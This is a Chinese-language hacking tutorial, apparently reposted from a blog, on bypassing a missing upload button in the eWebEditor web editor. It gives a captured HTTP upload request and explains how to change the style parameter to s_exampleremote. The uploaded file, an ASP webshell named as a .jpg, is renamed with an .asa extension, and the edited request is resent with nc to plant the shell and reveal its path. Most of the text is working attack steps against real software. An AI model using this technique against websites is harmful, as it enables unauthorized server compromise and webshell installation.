当遇到ewebeditor编辑器无上传按钮的时候,能设置样式,上传文件后缀能定义,可以下载数据库看S_ID和S_Name
看样子是有路,马上调用他
http://www.2cto.com /admin/ewebeditor/ewebeditor.asp?id=45&style=s_exampleremote
一看,没有上传文件的图标.这下麻烦,ASA是可以上传了,但怎么上传呢,具体请看操作:
先打开抓包的东东,正常上传一个jpg试试,这里的77169.jpg就是我们的ASP马了,只是改个名字
POST /admin/ewebeditor/upload.asp?action=save&type=IMAGE&style=standard HTTP/1.1 Accept: */* Referer: http://www.2cto.com /admin/ewebeditor/upload.asp?type=image&style=standard Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d83c837130798 UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) Host: www.xxxx.cn Content-Length: 79810 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDSSBTDCRT=EEDHFINDJGPEJJJFJHCJJIOK
-----------------------------7d83c837130798 Content-Disposition: form-data; name="uploadfile"; filename="G:\mm\77169.jpg" Content-Type: text/plain
(一共二条记录,下面的东东太多了,70多K,就省了,关键是前面) 以下忽略N字......
抓包后在这里我们发现/admin/ewebeditor/upload. asp ?action=save&type=IMAGE&style=standard
其中的style=standard有点眼熟啊,我把他改成s_exampleremote试试,再把77169.jpg改成77169.asa,(这里有二处,前面一处,最后还有一处)
改后存为a.txt
然后用nc发送
最后type b.txt
呵呵路径也出来了,登陆吧
form:三年离歌blog,由情整理编辑
查看更多关于ewebeditor无上传图标按钮突破上传 - 网站安全 - 自的详细内容...